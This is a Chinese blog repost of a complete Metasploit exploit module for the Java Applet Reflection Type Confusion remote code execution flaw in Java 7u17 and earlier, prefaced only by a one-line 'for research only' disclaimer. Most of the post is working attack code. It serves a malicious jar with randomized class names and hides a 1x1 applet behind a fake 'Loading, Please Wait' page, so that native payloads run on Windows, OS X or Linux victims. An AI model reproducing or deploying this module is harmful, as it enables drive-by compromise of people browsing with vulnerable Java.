博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Java Applet Reflection Type Confusion Remote Code Execution
阅读量:5104 次
发布时间:2019-06-13

本文共 3976 字,大约阅读时间需要 13 分钟。

测试方法:

提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. ##
    2. # This file is part of the Metasploit Framework and may be subject to
    3. # redistribution and commercial restrictions. Please see the Metasploit
    4. # web site for more information on licensing and terms of use.
    5. # http://metasploit.com/
    6. ##
    7.  
    8. require'msf/core'
    9. require'rex'
    10.  
    11. classMetasploit3<Msf::Exploit::Remote
    12. Rank=ExcellentRanking
    13.  
    14. include Msf::Exploit::Remote::HttpServer::HTML
    15. include Msf::Exploit::EXE
    16.  
    17. include Msf::Exploit::Remote::BrowserAutopwn
    18. autopwn_info({
      :javascript =>false})
    19.  
    20. def initialize( info ={})
    21.  
    22. super( update_info( info,
    23. 'Name'=>'Java Applet Reflection Type Confusion Remote Code Execution',
    24. 'Description'=>%q{
    25. Thismodule abuses JavaReflection to generate a TypeConfusion, due to a weak
    26. access control when setting final fields on static classes,and run code outside of
    27. the JavaSandbox.The vulnerability affects Java version 7u17and earlier.This
    28. exploit doesn't bypass click-to-play, so the user must accept the java warning in
    29. order to run the malicious applet.
    30. },
    31. 'License' => MSF_LICENSE,
    32. 'Author' =>
    33. [
    34. 'JeroenFrijters', # Vulnerability discovery and PoC
    35. 'juan vazquez' # Metasploit module
    36. ],
    37. 'References' =>
    38. [
    39. [ 'URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0' ],
    40. ['URL','http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html']
    41. ],
    42. 'Platform'=>['java','win','osx','linux'],
    43. 'Payload'=>{
      'Space'=>20480,'BadChars'=>'','DisableNops'=>true},
    44. 'Targets'=>
    45. [
    46. ['Generic (Java Payload)',
    47. {
    48. 'Platform'=>['java'],
    49. 'Arch'=> ARCH_JAVA,
    50. }
    51. ],
    52. ['Windows x86 (Native Payload)',
    53. {
    54. 'Platform'=>'win',
    55. 'Arch'=> ARCH_X86,
    56. }
    57. ],
    58. ['Mac OS X x86 (Native Payload)',
    59. {
    60. 'Platform'=>'osx',
    61. 'Arch'=> ARCH_X86,
    62. }
    63. ],
    64. ['Linux x86 (Native Payload)',
    65. {
    66. 'Platform'=>'linux',
    67. 'Arch'=> ARCH_X86,
    68. }
    69. ],
    70. ],
    71. 'DefaultTarget'=>0,
    72. 'DisclosureDate'=>'Jan 10 2013'
    73. ))
    74. end
    75.  
    76.  
    77. def setup
    78. path =File.join(Msf::Config.install_root,"data","exploits","jre7u17","Exploit.class")
    79. @exploit_class=File.open(path,"rb"){|fd| fd.read(fd.stat.size)}
    80. path =File.join(Msf::Config.install_root,"data","exploits","jre7u17","Union1.class")
    81. @union1_class=File.open(path,"rb"){|fd| fd.read(fd.stat.size)}
    82. path =File.join(Msf::Config.install_root,"data","exploits","jre7u17","Union2.class")
    83. @union2_class=File.open(path,"rb"){|fd| fd.read(fd.stat.size)}
    84. path =File.join(Msf::Config.install_root,"data","exploits","jre7u17","SystemClass.class")
    85. @system_class=File.open(path,"rb"){|fd| fd.read(fd.stat.size)}
    86.  
    87. @exploit_class_name= rand_text_alpha("Exploit".length)
    88. @exploit_class.gsub!("Exploit",@exploit_class_name)
    89. super
    90. end
    91.  
    92. def on_request_uri(cli, request)
    93. print_status("handling request for #{request.uri}")
    94.  
    95. case request.uri
    96. when/\.jar$/i
    97. jar = payload.encoded_jar
    98. jar.add_file("#{@exploit_class_name}.class",@exploit_class)
    99. jar.add_file("Union1.class",@union1_class)
    100. jar.add_file("Union2.class",@union2_class)
    101. jar.add_file("SystemClass.class",@system_class)
    102. metasploit_str = rand_text_alpha("metasploit".length)
    103. payload_str = rand_text_alpha("payload".length)
    104. jar.entries.each {
      |entry|
    105. entry.name.gsub!("metasploit", metasploit_str)
    106. entry.name.gsub!("Payload", payload_str)
    107. entry.data = entry.data.gsub("metasploit", metasploit_str)
    108. entry.data = entry.data.gsub("Payload", payload_str)
    109. }
    110. jar.build_manifest
    111.  
    112. send_response(cli, jar,{
      'Content-Type'=>"application/octet-stream"})
    113. when/\/$/
    114. payload = regenerate_payload(cli)
    115. ifnot payload
    116. print_error("Failed to generate the payload.")
    117. send_not_found(cli)
    118. return
    119. end
    120. send_response_html(cli, generate_html,{
      'Content-Type'=>'text/html'})
    121. else
    122. send_redirect(cli, get_resource()+'/','')
    123. end
    124.  
    125. end
    126.  
    127. def generate_html
    128. html =%Q|<html><head><title>Loading,PleaseWait...</title></head>|
    129. html +=%Q|<body><center><p>Loading,PleaseWait...</p></center>|
    130. html +=%Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
    131. html +=%Q|</applet></body></html>|
    132. return html
    133. end
    134.  
    135. end

转载于:https://www.cnblogs.com/security4399/archive/2013/04/25/3043667.html

你可能感兴趣的文章
大道至简——第二章读后感
查看>>
线程的分离与结合
查看>>
混沌数学之Arnold模型
查看>>
判断一个数是偶数还是素数 做相应处理并排序输出
查看>>
进制转换问题
查看>>
Docker 容器的数据管理
查看>>
驱动相关Error
查看>>
补坑:Prufer 编码总结
查看>>
mysql单节点大事务限制是哪个参数_java面试题汇总 转自多处
查看>>
ORACLE- PLSQL 游标的几种使用情况
查看>>
Maven依赖
查看>>
声笔飞码超字模式效率分析
查看>>
元旦快乐(2016-01-01)
查看>>
WCF服务部署到IIS上,然后通过web服务引用方式出现错误的解决办法
查看>>
jq地区联动
查看>>
paip.cache 缓存架构以及性能提升总结
查看>>
Atitit.atiDataStoreService v2 新特性
查看>>
Atitit.在线充值功能的设计
查看>>
解决CListCtrl闪烁及水平滚动条不能跟踪拖动的问题
查看>>
Thinkphp中使用display()方法显示视图模板,使用show()方法是显示文本内容
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2024-11-17 14:29:41   当前IP: 3.149.245.230   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我